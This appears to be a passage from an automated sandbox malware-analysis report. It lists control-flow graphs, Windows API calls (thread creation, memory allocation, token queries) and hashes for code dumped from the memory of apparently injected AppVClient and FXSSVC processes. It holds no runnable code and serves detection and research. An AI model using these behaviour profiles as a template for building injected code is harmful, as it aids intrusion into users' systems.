                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 474 be8318-be831c 475 be81e5 474->475 476 be8322 474->476 477 be81eb 475->477 478 be82a3-be82a5 475->478 476->475 479 be8328-be832c 476->479 480 be82b2-be82bc 477->480 481 be81f1 477->481 484 be82ab 478->484 485 be83f9 478->485 482 be832e-be8330 479->482 483 be82c5-be82c8 479->483 480->483 492 be8357-be836f GetTokenInformation 480->492 481->480 486 be81f7-be828e 481->486 489 be82dd-be82e3 482->489 490 be8332 482->490 483->485 493 be82ce 483->493 484->485 491 be82b1 484->491 487 be83ff 485->487 488 be82d2-be82d7 485->488 495 bef524-bef52e 487->495 497 be8306-be8309 488->497 498 be82e9 489->498 499 be83a3-be83a4 489->499 490->489 496 be8334 490->496 491->480 506 be8376-be837b 492->506 500 be828f-be8303 call c172ec 493->500 501 be82d0 493->501 503 bef807 495->503 496->495 497->482 504 be830b-be8311 CloseHandle 497->504 498->499 505 be82ef 498->505 499->495 500->497 518 be834f-be8355 500->518 501->488 501->500 507 bef8df-bef8e0 503->507 508 bef80d 503->508 504->482 510 be82f0-be831c 505->510 506->510 511 be8381 506->511 520 bf15a5-bf15aa 507->520 508->507 513 bef813 508->513 510->475 510->476 511->510 515 be8387 511->515 525 bef78f 513->525 526 bef81b 513->526 516 be8277-be827a 515->516 517 be8390-be8393 515->517 522 be827c 516->522 523 be8241 516->523 528 be827e 517->528 529 be8399 517->529 531 be8212-be821a GetTokenInformation 518->531 532 be8341 518->532 527 bf15ae-bf15af 520->527 522->523 522->528 523->506 535 be8251-be8260 call c172f4 523->535 525->526 533 bef795 525->533 526->507 534 bf15b2-bf15b7 527->534 528->504 530 be8284 528->530 529->528 536 be839f-be83a1 529->536 530->482 539 be83af 531->539 540 be8220-be8234 531->540 532->531 538 be8347 532->538 533->503 541 bf15ba-bf15c1 534->541 535->517 536->499 547 be834d 538->547 548 bf1638-bf1640 538->548 539->535 545 be83b5 539->545 568 be823a 540->568 569 be83d7-be83dd 540->569 542 bf15c7-bf15d2 541->542 543 bf1750-bf17a2 call c172f4 541->543 550 bf15d4-bf15d6 542->550 551 bf1620-bf1623 542->551 545->535 552 be83bb-be83ca 545->552 547->518 553 bf170e-bf1727 548->553 554 bf1646-bf165f 548->554 556 bf15dc-bf15df 550->556 557 bf1670-bf1684 550->557 558 bf1625-bf1628 551->558 559 bf16a0-bf16b4 551->559 552->516 586 be83d0 552->586 553->542 562 bf172d 553->562 554->542 563 bf1665 554->563 556->541 566 bf15e1-bf15f6 556->566 557->520 570 bf168a-bf168d 557->570 558->541 567 bf162a-bf1636 558->567 564 bf16b6-bf16b9 559->564 565 bf16f4-bf16f5 559->565 562->543 563->543 571 bf16bb 564->571 572 bf173a-bf173b 564->572 581 bf16fe-bf170c 565->581 573 bf15fc-bf1600 566->573 574 bf16d2-bf16d7 566->574 567->548 575 bf16dc-bf16ec 567->575 568->569 576 be8240 568->576 569->485 578 bf172f-bf1738 570->578 579 bf1693-bf1697 570->579 580 bf16bf-bf16cd 571->580 587 bf173f-bf1740 572->587 573->581 582 bf1606-bf1618 573->582 574->527 575->542 583 bf16f2 575->583 585 bfb32e-bfb330 576->585 578->587 579->580 590 bf1744-bf1748 581->590 582->534 583->543 588 bfb332-bfb337 call c172f4 585->588 589 bfb300 585->589 586->516 591 be83d6 586->591 587->590 588->589 597 bfb339 588->597 595 bfb2fd 589->595 596 bfb302 589->596 598 bfb2ff 595->598 599 bfb305 595->599 597->589 600 bfb33b-bfb33f 597->600 601 bfb308-bfb315 598->601 599->601 602 bfb322-bfb32d 599->602 600->601 601->599 604 bfb317 601->604 602->585 604->595
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE ref: 00BE830B
                                                                                                                                                                                                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE ref: 00BE8369
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.2171060482.0000000000BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_be0000_AppVClient.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleInformationToken
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 3954737543-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 87b0f20f54f9252f5619a7b4e2c673bb922280b839440e3d005162fb10a400e8
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AF06D34409EC2CB9A268A17D48053527E1EE61750B6840D9D44ECB162CF28DC02E76A

                                                                                                                                                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    Execution Coverage:5.4%
                                                                                                                                                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                    Total number of Nodes:62
                                                                                                                                                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:4
                                                                                                                                                                                                                                                                                                                                                                                                                    execution_graph 3943 d25d22 3944 d25cd4 CreateThread CloseHandle 3943->3944 3947 d25bbc 3943->3947 3944->3947 3945 d25c2c 3946 d25d56 CreateThread 3946->3947 3947->3944 3947->3945 3947->3946 3948 d25c84 3947->3948 3949 d25990 VirtualAlloc 3948->3949 3950 d25dcd 3949->3950 3950->3950 3901 d281e3 3905 d281e5 3901->3905 3902 d28357 GetTokenInformation 3902->3905 3903 d2830b CloseHandle 3903->3905 3904 d28212 GetTokenInformation 3904->3905 3906 d28220 3904->3906 3905->3902 3905->3903 3905->3904 3905->3906 3856 d25d50 CreateThread 3863 d25bbc 3856->3863 3857 d25cd4 CreateThread CloseHandle 3857->3863 3858 d25c84 3864 d25990 3858->3864 3859 d25c2c 3861 d25d56 CreateThread 3861->3863 3862 d25dcd 3862->3862 3863->3857 3863->3858 3863->3859 3863->3861 3866 d25994 wcscpy 3864->3866 3865 d25a23 3865->3862 3866->3865 3867 d25a8d VirtualAlloc 3866->3867 3867->3866 3931 d28201 3933 d281e5 3931->3933 3935 d28220 3931->3935 3932 d2830b CloseHandle 3932->3933 3933->3932 3934 d28357 GetTokenInformation 3933->3934 3933->3935 3936 d28212 GetTokenInformation 3933->3936 3934->3933 3936->3933 3936->3935 3868 d283e7 3871 d281e5 3868->3871 3869 d2830b CloseHandle 3869->3871 3870 d28212 GetTokenInformation 3870->3871 3873 d28220 3870->3873 3871->3869 3871->3870 3872 d28357 GetTokenInformation 3871->3872 3871->3873 3872->3871 3896 d258de 3897 d353f0 VirtualAlloc 3896->3897 3898 d258f9 3897->3898 3899 d281c0 3 API calls 3898->3899 3900 d25907 3899->3900 3874 d25b8f 3885 d353f0 3874->3885 3876 d25baf 3890 d281c0 3876->3890 3878 d25c2c 3879 d25c84 3880 d25990 VirtualAlloc 3879->3880 3881 d25dcd 3880->3881 3881->3881 3882 d25d56 CreateThread 3883 d25bbc 3882->3883 3883->3878 3883->3879 3883->3882 3884 d25cd4 CreateThread CloseHandle 3883->3884 3884->3883 3886 d353f4 3885->3886 3887 d3545e VirtualAlloc 3886->3887 3889 d353f6 3886->3889 3888 d35460 3887->3888 3888->3886 3889->3876 3894 d281e5 3890->3894 3891 d2830b CloseHandle 3891->3894 3892 d28357 GetTokenInformation 3892->3894 3893 d28212 GetTokenInformation 3893->3894 3895 d28220 3893->3895 3894->3891 3894->3892 3894->3893 3894->3895 3895->3883

                                                                                                                                                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00D281C0 Relevance: 4.9, APIs: 3, Instructions: 375COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 0 d281c0-d281d8 1 d283bf-d283ca 0->1 3 d283d0 1->3 4 d28277-d2827a 1->4 3->4 7 d283d6 3->7 5 d28241 4->5 6 d2827c 4->6 8 d28251-d28256 call d572f4 5->8 9 d28376-d2837b 5->9 6->5 10 d2827e 6->10 11 d283d7-d283dd 7->11 19 d2825b-d28260 8->19 15 d282f0-d2831c 9->15 16 d28381 9->16 12 d28284 10->12 13 d2830b-d28311 CloseHandle 10->13 17 d2832e-d28330 12->17 13->17 30 d28322 15->30 31 d281e5 15->31 16->15 21 d28387 16->21 22 d28332 17->22 23 d282dd-d282e3 17->23 24 d28390-d28393 19->24 21->4 21->24 22->23 26 d28334 22->26 28 d283a3-d283a4 23->28 29 d282e9 23->29 24->10 27 d28399 24->27 32 d2f524-d2f52e 26->32 27->10 33 d2839f-d283a1 27->33 29->28 34 d282ef 29->34 30->31 37 d28328-d2832c 30->37 35 d282a3-d282a5 31->35 36 d281eb 31->36 38 d2f807 32->38 33->28 34->15 39 d282ab 35->39 40 d283f9 35->40 41 d282b2-d2836f GetTokenInformation 36->41 42 d281f1 36->42 37->17 43 d282c5-d282c8 37->43 44 d2f8df-d2f8e0 38->44 45 d2f80d 38->45 39->40 46 d282b1 39->46 50 d282d2-d282d7 40->50 51 d283ff 40->51 41->9 42->41 47 d281f7 42->47 43->40 49 d282ce 43->49 55 d315a5-d315aa 44->55 45->44 52 d2f813 45->52 46->41 54 d2828e 47->54 56 d282d0 49->56 57 d2828f-d28303 call d572ec 49->57 58 d28306-d28309 50->58 51->32 60 d2f81b 52->60 61 d2f78f 52->61 54->57 59 d315ae-d315af 55->59 56->50 56->57 57->58 70 d2834f-d28355 57->70 58->13 58->17 63 d315b2-d315b7 59->63 60->44 61->60 64 d2f795 61->64 67 d315ba-d315c1 63->67 64->38 68 d31750-d317a2 call d572f4 67->68 69 d315c7-d315d2 67->69 72 d31620-d31623 69->72 73 d315d4-d315d6 69->73 75 d28212-d2821a GetTokenInformation 70->75 76 d28341 70->76 80 d316a0-d316b4 72->80 81 d31625-d31628 72->81 78 d31670-d31684 73->78 79 d315dc-d315df 73->79 83 d28220-d28234 75->83 84 d283af 75->84 76->75 86 d28347 76->86 78->55 85 d3168a-d3168d 78->85 79->67 89 d315e1-d315f6 79->89 87 d316b6-d316b9 80->87 88 d316f4-d316f5 80->88 81->67 82 d3162a-d31636 81->82 91 d31638-d31640 82->91 92 d316dc-d316ec 82->92 83->11 113 d2823a 83->113 84->8 93 d283b5 84->93 94 d31693-d31697 85->94 95 d3172f-d31738 85->95 86->91 96 d2834d 86->96 97 d316bb 87->97 98 d3173a-d3173b 87->98 101 d316fe-d3170c 88->101 99 d316d2-d316d7 89->99 100 d315fc-d31600 89->100 102 d31646-d3165f 91->102 103 d3170e-d31727 91->103 92->69 107 d316f2 92->107 93->8 104 d283bb-d283bd 93->104 106 d316bf-d316cd 94->106 105 d3173f-d31740 95->105 96->70 97->106 98->105 99->59 100->101 108 d31606-d31618 100->108 109 d31744-d31748 101->109 102->69 112 d31665 102->112 103->69 111 d3172d 103->111 104->1 105->109 107->68 108->63 111->68 112->68 113->11 114 d28240 113->114 115 d3b32e-d3b330 114->115 116 d3b332-d3b337 call d572f4 115->116 117 d3b300 115->117 116->117 125 d3b339 116->125 120 d3b302 117->120 121 d3b2fd 117->121 123 d3b305 121->123 124 d3b2ff 121->124 126 d3b308-d3b315 123->126 127 d3b322-d3b32d 123->127 124->126 125->117 128 d3b33b-d3b33f 125->128 126->123 130 d3b317 126->130 127->115 128->126 130->121
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2179585157.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d20000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1cefe6a1d073a468b2f47e60a6f5afefe70bf264b610db135861494dc24b89b7
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5b8df1e3048b2dc71c851735b053fc846665285a9bd45dcdc19b72efb4852fca
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1cefe6a1d073a468b2f47e60a6f5afefe70bf264b610db135861494dc24b89b7
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2B1293450EA66CBC729CB1CA481275B7A1FFB5318F2C8659D8CBC7166DE24DC02A376
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00D25B8F Relevance: 4.7, APIs: 3, Instructions: 161threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 131 d25b8f-d25c20 call d353f0 call d58358 call d40320 call d281c0 141 d25c26 131->141 142 d25cf4-d25d08 call d572ec 131->142 141->142 143 d25c2c-d25c2f 141->143 146 d25c87-d25dc8 call d25e60 call d25990 142->146 147 d25d0e 142->147 161 d25dcd 146->161 147->146 149 d25d14-d25d18 147->149 152 d25c65 149->152 153 d25daf-d25db6 call d252d0 149->153 155 d25ca3 call d25df0 152->155 156 d25c67 152->156 164 d25c30-d25c39 153->164 165 d25dbc 153->165 170 d25c45-d25d6d call d41520 155->170 156->155 159 d25c69-d25c9d 156->159 181 d25c85 159->181 182 d25c9f 159->182 161->161 176 d25bf7 164->176 177 d25cb9-d25cbd 164->177 167 d25dbe 165->167 168 d25d7d-d25d89 165->168 167->168 180 d25d9b 167->180 178 d25d94 168->178 179 d25d8b-d25d92 168->179 184 d25bfd-d25c06 170->184 194 d25d73 170->194 176->177 176->184 185 d25cc3 177->185 186 d25d56-d25d5b CreateThread 177->186 178->143 191 d25cb3 178->191 179->178 187 d25d9c 179->187 180->187 181->146 182->181 189 d25ca1 182->189 199 d25da5-d25da8 184->199 185->186 193 d25cc9 185->193 196 d25c7e 186->196 197 d25d1f-d25d45 186->197 187->199 189->155 191->143 191->177 193->186 194->184 198 d25d79-d25d7b 194->198 196->197 200 d25c84 196->200 202 d25d47 197->202 203 d25cd4-d25cea CreateThread CloseHandle 197->203 198->168 199->153 200->181 202->203 203->179 205 d25cf0-d25d4d 203->205 205->178
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2179585157.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d20000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 16d53580ed2a3c5b3a0690c5b366b87d7d491efa3a22dc0b1195cf5b7b535bdc
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D241E220608F298FDB689728B409F3927D1EBB531CF5C01AAD446CB1ADEA35CC01A772
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00D25D22 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 207 d25d22-d25d45 208 d25d47 207->208 209 d25cd4-d25cea CreateThread CloseHandle 207->209 208->209 211 d25cf0-d25d4d 209->211 212 d25d8b-d25d92 209->212 214 d25d94 211->214 212->214 215 d25d9c 212->215 217 d25cb3 214->217 218 d25c2c-d25c2f 214->218 219 d25da5-d25db6 call d252d0 215->219 217->218 220 d25cb9-d25cbd 217->220 230 d25c30-d25c39 219->230 231 d25dbc 219->231 222 d25cc3 220->222 223 d25d56-d25d5b CreateThread 220->223 222->223 226 d25cc9 222->226 228 d25c7e 223->228 229 d25d1f-d25d45 223->229 226->223 228->229 232 d25c84-d25dc8 call d25e60 call d25990 228->232 229->208 229->209 230->220 241 d25bf7 230->241 233 d25dbe 231->233 234 d25d7d-d25d89 231->234 250 d25dcd 232->250 233->234 243 d25d9b 233->243 234->212 234->214 241->220 244 d25bfd-d25c06 241->244 243->215 244->219 250->250
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2179585157.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d20000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 087ff7d6d16cc6327b9a5f341d223b13e78c5ac83f0ac5b07ad4de6eba279160
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1EF0C22161CE2585DB2C8629B859B3A63C1A7B932CF6C475AC097C90DCFA75C901A235
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00D25D50 Relevance: 1.5, APIs: 1, Instructions: 8threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 251 d25d50-d25d5b CreateThread 252 d25c78 251->252 253 d25c7e 252->253 254 d25d1f-d25d45 252->254 253->254 255 d25c84-d25dc8 call d25e60 call d25990 253->255 257 d25d47 254->257 258 d25cd4-d25cea CreateThread CloseHandle 254->258 279 d25dcd 255->279 257->258 261 d25cf0-d25d4d 258->261 262 d25d8b-d25d92 258->262 265 d25d94 261->265 262->265 266 d25d9c 262->266 270 d25cb3 265->270 271 d25c2c-d25c2f 265->271 273 d25da5-d25db6 call d252d0 266->273 270->271 274 d25cb9-d25cbd 270->274 283 d25c30-d25c39 273->283 284 d25dbc 273->284 277 d25cc3 274->277 278 d25d56-d25d5b CreateThread 274->278 277->278 281 d25cc9 277->281 278->252 279->279 281->278 283->274 291 d25bf7 283->291 285 d25dbe 284->285 286 d25d7d-d25d89 284->286 285->286 292 d25d9b 285->292 286->262 286->265 291->274 293 d25bfd-d25c06 291->293 292->266 293->273
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2179585157.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d20000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3a4a21c725e83fd5e75ec8b5d1bf0564c1857d88227c72374940ca83cf1eb527
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15B09201029EA6550215123034089280A846AA623CA785BA98BB2468DAE82058046730
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00D25990 Relevance: 1.4, APIs: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 295 d25990-d2599b 297 d25a33-d25a61 call d59b00 295->297 298 d259a1 295->298 308 d25a63 297->308 309 d25ab4-d25aba call d41080 297->309 298->297 300 d259a7-d259ab 298->300 304 d259b1-d259f3 call d52320 300->304 305 d25a59 300->305 304->305 324 d259f5-d259fa 304->324 306 d25a25-d25a2d 305->306 307 d25a5b 305->307 313 d25a70-d25a7b 306->313 314 d25a2f 306->314 307->306 319 d25a23 307->319 308->309 311 d25a65 308->311 328 d25a83-d25a88 call d25df0 309->328 331 d25a13 309->331 311->313 317 d25a16-d25a1e call d41470 313->317 318 d25a7d 313->318 314->311 332 d25a96-d25ac2 317->332 318->317 322 d25a7f-d25a81 318->322 323 d25a24 319->323 322->328 329 d25a51-d25a54 call d5233c 324->329 330 d259fc 324->330 337 d25a8d VirtualAlloc 328->337 329->305 330->329 334 d259fe-d25a02 330->334 331->328 336 d25a15 331->336 332->323 339 d25ac8 332->339 334->329 336->317 337->332 339->323 340 d25ace 339->340 340->297
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2179585157.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d20000_FXSSVC.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 1284135714-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: ba0acb4e1046a8efdd5dcf168ada09d669d2603bff7b8c7483f4d4c3a5800a69
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E21D42056DEB48BC76A93187493E7526A2F7B532CF5C03CBD0C6C718ED938AD448272
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00D28245 Relevance: 1.3, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 342 d28245-d28247 343 d282d2-d282d7 342->343 344 d2824d-d2824f 342->344 346 d28306-d28309 343->346 345 d28251-d28260 call d572f4 344->345 356 d28390-d28393 345->356 347 d2830b-d28311 CloseHandle 346->347 348 d2832e-d28330 346->348 347->348 350 d28332 348->350 351 d282dd-d282e3 348->351 350->351 353 d28334 350->353 354 d283a3-d283a4 351->354 355 d282e9 351->355 357 d2f524-d2f52e 353->357 355->354 360 d282ef 355->360 358 d28399 356->358 359 d2827e 356->359 362 d2f807 357->362 358->359 361 d2839f-d283a1 358->361 359->347 363 d28284 359->363 364 d282f0-d2831c 360->364 361->354 365 d2f8df-d2f8e0 362->365 366 d2f80d 362->366 363->348 375 d28322 364->375 376 d281e5 364->376 370 d315a5-d315aa 365->370 366->365 368 d2f813 366->368 373 d2f81b 368->373 374 d2f78f 368->374 372 d315ae-d315af 370->372 377 d315b2-d315b7 372->377 373->365 374->373 378 d2f795 374->378 375->376 381 d28328-d2832c 375->381 379 d282a3-d282a5 376->379 380 d281eb 376->380 382 d315ba-d315c1 377->382 378->362 383 d282ab 379->383 384 d283f9 379->384 385 d282b2-d2836f GetTokenInformation 380->385 386 d281f1 380->386 381->348 387 d282c5-d282c8 381->387 388 d31750-d317a2 call d572f4 382->388 389 d315c7-d315d2 382->389 383->384 390 d282b1 383->390 384->343 397 d283ff 384->397 411 d28376-d2837b 385->411 386->385 391 d281f7-d2828e 386->391 387->384 393 d282ce 387->393 395 d31620-d31623 389->395 396 d315d4-d315d6 389->396 390->385 400 d2828f-d28303 call d572ec 391->400 399 d282d0 393->399 393->400 404 d316a0-d316b4 395->404 405 d31625-d31628 395->405 402 d31670-d31684 396->402 403 d315dc-d315df 396->403 397->357 399->343 399->400 400->346 435 d2834f-d28355 400->435 402->370 407 d3168a-d3168d 402->407 403->382 410 d315e1-d315f6 403->410 408 d316b6-d316b9 404->408 409 d316f4-d316f5 404->409 405->382 406 d3162a-d31636 405->406 413 d31638-d31640 406->413 414 d316dc-d316ec 406->414 415 d31693-d31697 407->415 416 d3172f-d31738 407->416 417 d316bb 408->417 418 d3173a-d3173b 408->418 423 d316fe-d3170c 409->423 419 d316d2-d316d7 410->419 420 d315fc-d31600 410->420 411->364 421 d28381 411->421 425 d31646-d3165f 413->425 426 d3170e-d31727 413->426 414->389 429 d316f2 414->429 428 d316bf-d316cd 415->428 427 d3173f-d31740 416->427 417->428 418->427 419->372 420->423 430 d31606-d31618 420->430 421->364 431 d28387 421->431 432 d31744-d31748 423->432 425->389 434 d31665 425->434 426->389 433 d3172d 426->433 427->432 429->388 430->377 431->356 436 d28277-d2827a 431->436 433->388 434->388 440 d28212-d2821a GetTokenInformation 435->440 441 d28341 435->441 437 d28241 436->437 438 d2827c 436->438 437->345 437->411 438->359 438->437 442 d28220-d28234 440->442 443 d283af 440->443 441->440 444 d28347 441->444 451 d283d7-d283dd 442->451 452 d2823a 442->452 443->345 446 d283b5 443->446 444->413 447 d2834d 444->447 446->345 448 d283bb-d283ca 446->448 447->435 448->436 456 d283d0 448->456 452->451 453 d28240 452->453 455 d3b32e-d3b330 453->455 459 d3b332-d3b337 call d572f4 455->459 460 d3b300 455->460 456->436 458 d283d6 456->458 458->451 459->460 468 d3b339 459->468 463 d3b302 460->463 464 d3b2fd 460->464 466 d3b305 464->466 467 d3b2ff 464->467 469 d3b308-d3b315 466->469 470 d3b322-d3b32d 466->470 467->469 468->460 471 d3b33b-d3b33f 468->471 469->466 473 d3b317 469->473 470->455 471->469 473->464
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
